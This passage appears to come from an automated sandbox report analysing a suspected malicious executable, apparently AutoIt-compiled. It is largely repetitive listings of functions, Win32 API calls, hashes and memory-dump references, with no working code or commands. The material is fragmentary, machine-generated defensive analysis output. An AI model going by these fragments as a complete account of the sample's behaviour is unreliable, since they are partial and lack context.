                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID: bad allocation
                                    • API String ID: 3902256705-2104205924
                                    • Opcode ID: 8bbba947bb1bc7168712327cceac36e2f878262598945d7b2e37bf1b9529eafc
                                    • Instruction ID: 020418589a85a726176028a80eda76abc13d8b14ef94b732df1d6027bca3ddd9
                                    • Opcode Fuzzy Hash: 8bbba947bb1bc7168712327cceac36e2f878262598945d7b2e37bf1b9529eafc
                                    • Instruction Fuzzy Hash: EAF0D63590431DA6EF20BB98EC015DE77A8FF06310F000415F904E6A81DF709A9099A2
                                    Function 015F9900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 015F9945
                                    • ExitProcess.KERNEL32(00000000), ref: 015F9964
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Process$CreateExit
                                    • String ID: D
                                    • API String ID: 126409537-2746444292
                                    • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                    • Instruction ID: 7cb19ddaaa5c93dd8bc9d4367ad973c89a035aa0bb9d07555e991c873546cb4d
                                    • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                    • Instruction Fuzzy Hash: AEF0ECB554024DABDB60DFE4CD49FEE777CBF44705F048508BB0A9A184DB7496088B61
                                    Function 008E98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 008E98F8
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008E990F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: ca7908eb36e60ac775beae31ffa854057beb3a8740970075f605dd3d33efc3ae
                                    • Instruction ID: b207bd1cd459db0b05e895820d6928f979690bcc1e825308983de17b2f6d31a9
                                    • Opcode Fuzzy Hash: ca7908eb36e60ac775beae31ffa854057beb3a8740970075f605dd3d33efc3ae
                                    • Instruction Fuzzy Hash: 51D05E7954430DAFDB60DBA4DC0EF9A773CEB04704F0002B1BAA4D10A1EAB0A6989B91
                                    Function 008FCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 55ad9965db937efe6c5940ea0aa70cc9af0cb20057a388f137b7ca89b1520733
                                    • Instruction ID: cfb3629f6525ad7239ce16fcbe5009847ed82bd69f96ba0e436807e53ebb8c1a
                                    • Opcode Fuzzy Hash: 55ad9965db937efe6c5940ea0aa70cc9af0cb20057a388f137b7ca89b1520733
                                    • Instruction Fuzzy Hash: CAF127716083099FC714DF28C580A6ABBE5FF89314F14892EF999DB251DB70EA45CF82
                                    Function 0088F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A0193
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 008A019B
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A01A6
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A01B1
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 008A01B9
                                      • Part of subcall function 008A0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 008A01C1
                                      • Part of subcall function 008960F9: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00896154
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0088F9CD
                                    • OleInitialize.OLE32(00000000), ref: 0088FA4A
                                    • CloseHandle.KERNEL32(00000000), ref: 008C45C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                    • String ID:
                                    • API String ID: 3094916012-0
                                    • Opcode ID: ebd58c000e4520606c5aa073475ab415e4129c2e18aa1d2a9672ed144e424bdc
                                    • Instruction ID: 4dcd07a7359faed8c3f98b294f32cf2f0ccebfc407e62cbb45f50d82e3f1d092
                                    • Opcode Fuzzy Hash: ebd58c000e4520606c5aa073475ab415e4129c2e18aa1d2a9672ed144e424bdc
                                    • Instruction Fuzzy Hash: 0C81CEB8929B40CFC394EFB9A850E187BE5FB5A316756813AE119CB273E7704484EF11
                                    Function 0088434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00884370
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00884415
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00884432
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$_memset
                                    • String ID:
                                    • API String ID: 1505330794-0
                                    • Opcode ID: 10b7acb4a44160868958cc8f18c040efce40245672cd0c1d230b444ae4babc4d
                                    • Instruction ID: 675c34df21e52efdc832f4bbf556cc1eaa39ab2f4037734c12520f3042352a5e
                                    • Opcode Fuzzy Hash: 10b7acb4a44160868958cc8f18c040efce40245672cd0c1d230b444ae4babc4d
                                    • Instruction Fuzzy Hash: E63193715097029FD721EF64D884A9BBBF8FB59308F00092EE59AC2352E7B1A944CB52
                                    Function 008A571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 008A5733
                                      • Part of subcall function 008AA16B: __NMSG_WRITE.LIBCMT ref: 008AA192
                                      • Part of subcall function 008AA16B: __NMSG_WRITE.LIBCMT ref: 008AA19C
                                    • __NMSG_WRITE.LIBCMT ref: 008A573A
                                      • Part of subcall function 008AA1C8: GetModuleFileNameW.KERNEL32(00000000,009433BA,00000104,00000000,00000001,00000000), ref: 008AA25A
                                      • Part of subcall function 008AA1C8: ___crtMessageBoxW.LIBCMT ref: 008AA308
                                      • Part of subcall function 008A309F: ___crtCorExitProcess.LIBCMT ref: 008A30A5
                                      • Part of subcall function 008A309F: ExitProcess.KERNEL32 ref: 008A30AE
                                      • Part of subcall function 008A8B28: __getptd_noexit.LIBCMT ref: 008A8B28
                                    • RtlAllocateHeap.NTDLL(01550000,00000000,00000001), ref: 008A575F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    • Opcode ID: 558e93bb2c8f939942106138bce7202282ef59983c5c09b90679cac65e3c8d4e
                                    • Instruction ID: b43351bbbcd105a1f58b455429e85496e04d2abaa031c1637effdceff59b7dc6
                                    • Opcode Fuzzy Hash: 558e93bb2c8f939942106138bce7202282ef59983c5c09b90679cac65e3c8d4e
                                    • Instruction Fuzzy Hash: 8501B535244F01EAF615273CEC82A2E7398FB43765F600525F515FAD81DFB09D819672
                                    Function 008E98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008E9548,?,?,?,?,?,00000004), ref: 008E98BB
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008E9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008E98D1
                                    • CloseHandle.KERNEL32(00000000,?,008E9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E98D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                                    • Instruction ID: de0ff2be360e561849c964aec510c5faef9969bcfbe01a8572e691d68e1ba027
                                    • Opcode Fuzzy Hash: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                                    • Instruction Fuzzy Hash: CAE08632144228BBD7311B54EC09FCA7B19EB06B70F104220FB54A94E087B12611A7D8
                                    Function 008E8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 008E8D1B
                                      • Part of subcall function 008A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9A24), ref: 008A2D69
                                      • Part of subcall function 008A2D55: GetLastError.KERNEL32(00000000,?,008A9A24), ref: 008A2D7B
                                    • _free.LIBCMT ref: 008E8D2C
                                    • _free.LIBCMT ref: 008E8D3E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                    • Instruction ID: 01499fef40f49d7adec1508163be2a8999069dc41c9b7cfe767f45c7b7b60560
                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                    • Instruction Fuzzy Hash: A4E012A170264586EB35A57DAD40A9713DCEF5A3527141D1DB40DD7587CE64F8428124
                                    Function 0088A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: CALL
                                    • API String ID: 0-4196123274
                                    • Opcode ID: 6642e21484f13cd4b5b71a561a90a598980cbe2fb6a558d70a1e44a78aaa31c3
                                    • Instruction ID: 6910b13d406f699039b7e32ec556b8527f2972ba60defbe37db1abc186e012b4
                                    • Opcode Fuzzy Hash: 6642e21484f13cd4b5b71a561a90a598980cbe2fb6a558d70a1e44a78aaa31c3
                                    • Instruction Fuzzy Hash: 40225D74508205DFDB28EF18C450A6ABBE1FF85314F14896EE98ADB362D735EC45CB82
                                    Function 00884C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID: EA06
                                    • API String ID: 4104443479-3962188686
                                    • Opcode ID: 59ee41d0af0eaba8175910152844aebfc184eb9504d05555a9c636d0f454818f
                                    • Instruction ID: b2d7201cb93285fd9395ea982c46d223737644abc3b8f4817fb5b04ba103b7b2
                                    • Opcode Fuzzy Hash: 59ee41d0af0eaba8175910152844aebfc184eb9504d05555a9c636d0f454818f
                                    • Instruction Fuzzy Hash: 47415D23A0425E67DF21BB68C8517BE7FA6FB45304F686475FC82DB282D6345D4483A2
                                    Function 00887A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                    • Instruction ID: 01dc4a0225441cfcdc77099f911db158ad188bd0a591e24b909d54e5b506775d
                                    • Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                    • Instruction Fuzzy Hash: 8031CAB2604516AFC704EF68C8D1D69F3B5FF493207258629E519CB791EB30ED60CB90
                                    Function 008847D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • 745EC8D0.UXTHEME ref: 00884834
                                      • Part of subcall function 008A336C: __lock.LIBCMT ref: 008A3372
                                      • Part of subcall function 008A336C: RtlDecodePointer.NTDLL(00000001), ref: 008A337E
                                      • Part of subcall function 008A336C: RtlEncodePointer.NTDLL(?), ref: 008A3389
                                      • Part of subcall function 008848FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00884915
                                      • Part of subcall function 008848FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0088492A
                                      • Part of subcall function 00883B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B68
                                      • Part of subcall function 00883B3A: IsDebuggerPresent.KERNEL32 ref: 00883B7A
                                      • Part of subcall function 00883B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009452F8,009452E0,?,?), ref: 00883BEB
                                      • Part of subcall function 00883B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00883C6F
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00884874
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                    • String ID:
                                    • API String ID: 2688871447-0
                                    • Opcode ID: 6f2430e49bd2ced7a2c30042d9c2ed331f2523eb410446dc7d326e6430ffd12d
                                    • Instruction ID: 09eb070b9f8dd28051087d68a215ef562e4ddffaf157532e408c189a3d234f61
                                    • Opcode Fuzzy Hash: 6f2430e49bd2ced7a2c30042d9c2ed331f2523eb410446dc7d326e6430ffd12d
                                    • Instruction Fuzzy Hash: A1118E719283029FCB00EF68E80591ABFE8FF86750F10452BF051C3272DBB09644DB92
                                    Function 008A55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    • Opcode ID: a80c093686bc2db12f19d67e0a47e02d810a9092e6836085a66eecb33b81e77c
                                    • Instruction ID: ed180e355e86904c5a51db08803e17c1dfb53dd83d40128cec3ebabddcd02fa7
                                    • Opcode Fuzzy Hash: a80c093686bc2db12f19d67e0a47e02d810a9092e6836085a66eecb33b81e77c
                                    • Instruction Fuzzy Hash: 0201D471800A08EBEF12AF6CCD0249E7B71FFA3321F444115F8149B591EB318AA1DFA2
                                    Function 008A53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008A8B28: __getptd_noexit.LIBCMT ref: 008A8B28
                                    • __lock_file.LIBCMT ref: 008A53EB
                                      • Part of subcall function 008A6C11: __lock.LIBCMT ref: 008A6C34
                                    • __fclose_nolock.LIBCMT ref: 008A53F6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    • Opcode ID: f7129c6b4d9e22aeb64323f388bfe36cbd861f46b7e88ba4ce87d0566fc8fc88
                                    • Instruction ID: e934067ad5eae2ff363fd58cd1190628272006d0ab84c1fffc69ea622f120d1b
                                    • Opcode Fuzzy Hash: f7129c6b4d9e22aeb64323f388bfe36cbd861f46b7e88ba4ce87d0566fc8fc88
                                    • Instruction Fuzzy Hash: 99F09671801A04DAFF106B6998057AE7AE0FF83374F248508E464EBAC1DBBC49815B63
                                    Function 015F9970 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 015F91E0: GetFileAttributesW.KERNELBASE(?), ref: 015F91EB
                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 015F9A9F
